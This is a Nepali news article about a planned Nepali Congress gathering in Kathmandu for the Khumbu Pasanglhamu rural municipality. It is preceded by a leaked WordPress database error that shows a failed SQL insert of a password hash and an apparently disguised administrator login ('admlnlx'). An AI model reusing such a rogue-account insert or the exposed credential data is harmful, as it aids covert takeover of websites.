WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIvWX2hlvtnWpaQRgMiUwsMZr2I9Id0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 06:51:01', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । नेपाली काँग्रेस खुम्बु पासाङल्हमू गाउँपालिकाको बृहत भेला राजधानीमा २४ गते बिहीबार हुने भएको छ ।
नेपाली काँग्रेसका महामन्त्री डा. शशांक कोइरालाको प्रमुख आतिथ्यतामा हुने भेलामा काँग्रेसका केन्द्रिय, प्रादेशिक र जिल्लास्तरका नेता कार्याकर्ताहरुको उपस्थिती रहने नेपाली काँग्रेस खुम्बु पासाङल्हमू गाउँपालिकाका सभापति पेम्बाछिरिङ शेर्पाले जानकारी दिए ।
राजधानीको धुम्बाराही स्थित स्काईजोन पार्टी प्यालेसमा बिहान १० बजेबाट शुरु हुने भेलामा काँग्रेसको वर्तमान अवस्था तथा भावी रणनीतिका विषयमा छलफल हुने नेपाली काँग्रेसका महाधिवेसन प्रतिनिधि तथा तरुण दल सोलुखुम्बुका अध्यक्ष अशोक झाले बताए ।
खुम्बुमा काँग्रेसको वर्तमान स्थितीको समिक्षा गर्दै कसरी सबल बनाउने विषयमा गम्भिर बहस हुने बताइएको छ ।